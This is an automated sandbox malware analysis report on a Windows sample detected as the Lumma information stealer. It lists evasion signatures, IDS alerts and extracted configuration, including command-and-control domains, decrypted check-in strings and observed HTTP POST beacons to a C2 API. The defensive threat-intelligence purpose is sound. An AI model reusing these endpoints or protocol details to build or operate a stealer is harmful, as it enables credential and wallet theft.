Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532571
MD5:fb08a9067fae7bfd248416c863bd43d2
SHA1:1564f87b3da33b611dcb92dd5ff7362220af474a
SHA256:b649fde943868879f85d809bf5e84d9873b1c5ed308941e19cebb3ea6a230aff
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB08A9067FAE7BFD248416C863BD43D2)
    • WerFault.exe (PID: 7716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 1920 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["licendfilteo.site", "studennotediw.store", "bathdoomgaz.store", "mobbipenju.store", "spirittunek.store", "dissapoiznw.store", "clearancek.site", "eaglepawnoy.store"], "Build id": "1i4--Ds"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:15.252363+020020546531A Network Trojan was detected192.168.2.749714172.67.206.204443TCP
    2024-10-13T17:46:16.505914+020020546531A Network Trojan was detected192.168.2.749719172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:15.252363+020020498361A Network Trojan was detected192.168.2.749714172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:16.505914+020020498121A Network Trojan was detected192.168.2.749719172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:13.202147+020020564771Domain Observed Used for C2 Detected192.168.2.7538601.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:12.993655+020020564711Domain Observed Used for C2 Detected192.168.2.7593401.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:13.171047+020020564811Domain Observed Used for C2 Detected192.168.2.7647811.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:13.157597+020020564831Domain Observed Used for C2 Detected192.168.2.7557041.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:13.225766+020020564731Domain Observed Used for C2 Detected192.168.2.7570191.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:13.143968+020020564851Domain Observed Used for C2 Detected192.168.2.7616111.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:13.214638+020020564751Domain Observed Used for C2 Detected192.168.2.7609321.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:13.182860+020020564791Domain Observed Used for C2 Detected192.168.2.7515381.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T17:46:14.500243+020028586661Domain Observed Used for C2 Detected192.168.2.749709104.102.49.254443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.7352.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "studennotediw.store", "bathdoomgaz.store", "mobbipenju.store", "spirittunek.store", "dissapoiznw.store", "clearancek.site", "eaglepawnoy.store"], "Build id": "1i4--Ds"}
    Multi AV Scanner detection for domain / URL
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 21%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: https://eaglepawnoy.store:443/apiVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: https://sergei-esenin.com:443/api%Virustotal: Detection: 9%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 18%Perma Link
    Source: https://sergei-esenin.com/apiJVirustotal: Detection: 9%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: https://studennotediw.store:443/apiVirustotal: Detection: 21%Perma Link
    Multi AV Scanner detection for submitted file
    Source: file.exeVirustotal: Detection: 53%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1564500270.00000000006A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49719 version: TLS 1.2

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:55704 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:64781 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:59340 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:61611 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:60932 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:57019 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:51538 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:53860 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49709 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49719 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49714 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49714 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49719 -> 172.67.206.204:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewIP Address: 172.67.206.204 172.67.206.204
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=cKYJNG4PUdZgy2T2WC.4u4JOPeXDHIGLF0EcZVHEveg-1728834375-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/apiz
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akam
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamsta
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilevC
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vP
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vP05w
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGt
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_resp
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
